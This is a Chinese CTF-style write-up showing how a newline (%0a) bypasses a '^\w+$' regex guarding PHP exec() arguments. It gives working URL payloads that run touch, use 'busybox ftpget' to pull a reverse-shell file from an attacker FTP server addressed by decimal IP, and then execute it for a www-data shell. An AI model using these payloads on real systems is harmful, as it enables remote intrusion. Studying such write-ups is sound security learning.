环境:
攻击机:kali--192.168.198.128、win10浏览器
目标机器:ubuntu--92.168.198.135
题目源代码:
为用户创建一个沙箱目录,对用户输入数据作正则限制”^w+$“,让后用用户输入数据执行exec(),这是注命令执行点。关键是要对正则限制的绕过,限制为:输入只能有数字、字母下划线组成,这导致我们无法直接利用&&、$()等来进行执行我们的命令。因为题目里得到正则表达式没有开启多行匹配,可用用换行符来绕过,即正则表达式最后的 $ 符看到 n 就认为匹配完了。而且,利用换行符我们可用执行后面我们的命令。如下建 执行 touch test 命令。
http://ip/index.php?args[0]=a%0a&args[1]=touch&args[2]test
执行后网站后台成功创建test文件
单我们直接向文件写入数据比较困难 > 符号用不了,我们写不了数据但我们可用让它下载数据,利用 wget、ftp 等从我们自己搭建平台下载数据,下列以 FTP为例
wget可用参考下面的文章:
https://blog.spoock.com/2017/09/09/Babyfirst-writeup/
首先搭建自己的FTP服务平台,利用python 的pyftpdlib模块快速搭建一个匿名FTP服务(对于在真实环境中,我们要让目标机器访问到我们得到FTP服务,我们的主机必须要有公网IP或者和目标主机在同一网络下)。下载pyftpdlib模块
pip下载:pip install pyftpdlib
创建含反弹shell 的文件
执行搭建:python -m pyftpdlib -p 21
将搭建的TFP服务平台的IP地址转换为十进制(因为正则限制下不能有点符号)
构造
busybox ftpget 3232286336 1
?args[0]=a%0a&args[1]=busybox&args[2]=ftpget&args[3]=3232286336&args[4]=1
浏览器执行:
网站后台已经成功次下载了 含反弹shell的文件
现在只需要执行目标机器上的反弹shell ,我们就能以www-data的身份进入系统内
在反弹的IP机器上监听:
浏览器输入
?args[0]=a%0a&args[1]=bash&args[2]=1
可用看到我们的攻击机已经成功连接目标机器:
